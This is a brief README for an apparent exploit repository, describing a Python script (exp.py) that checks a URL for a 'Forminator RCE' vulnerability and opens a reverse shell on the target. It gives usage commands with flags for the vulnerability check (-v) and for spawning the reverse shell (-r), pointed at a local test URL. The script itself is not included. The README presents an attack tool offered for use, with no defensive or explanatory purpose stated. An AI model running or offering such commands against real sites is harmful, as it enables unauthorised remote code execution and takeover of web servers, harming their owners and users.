Exploit Script

This repository contains a Python script (exp.py) designed to check for vulnerabilities FORMINATOR RCE and execute a reverse shell on a given URL.

Usage

checker

python check.py

To use the script, run the following command:

python3 exp.py -u http://127.0.0.1:8000/?p=7

check vuln or not

python3 exp.py -u http://127.0.0.1:8000/?p=7 -v

reverse shell

python3 exp.py -u http://127.0.0.1:8000/?p=7 -r